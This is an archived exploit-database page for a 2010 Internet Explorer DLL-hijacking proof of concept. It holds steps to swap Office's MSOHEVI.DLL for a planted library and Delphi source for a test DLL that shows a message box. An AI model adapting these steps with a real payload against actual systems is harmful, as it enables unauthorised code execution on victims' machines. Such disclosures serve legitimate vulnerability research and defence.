Lucene search
+L

Internet Explorer Dll Hijacking Exploit

🗓️ 08 Sep 2010 00:00:00Reported by STRELiTZIAType 
zdt
 zdt
🔗 0day.today👁 14 Views

Internet Explorer Dll Hijacking Exploit allows local code execution without user consent. Vulnerability in loading library without checks

Code
=======================================
Internet Explorer Dll Hijacking Exploit
=======================================

Exploit Title  : [Internet Explorer Dll Hijacking Exploit]
Date           : [08 Sept 2010]
Author         : [STRELiTZIA]
Software       : [INTERNET EXPLORER]
Tested on      : [Windows Xp SP3 + Office 2007]
	
============================
=       Description        = 
============================
Internet Explorer laod %drive%:\%Program Files%\Microsoft Office\Office12\MSOHEVI.DLL library without checks,
or any visual warning messages related to library modifications.
Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege
context of the targeted application.
 
 
============================
=       Instructions       =
============================
1- Copy "Test.dll" into "%drive%:\%Program Files%\Microsoft Office\Office12\"
2- Rename "MSOHEVI.DLL" to "MSOHEVI.DLL_Original".
3- Rename "Test.dll" to "MSOHEVI.DLL".
	
============================
=          Tests           =
============================
- Launch Internet Explorer.

	
============================
= Test Dll Source "Delphi" =
============================
Library Test;
uses
  Windows;

begin
  MessageBoxA
    (
    0,
    PChar('Yep, I''m running in your system without your permission.'),
	PChar('Sample'),
    MB_ICONSTOP
    );
end.



#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Sep 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
14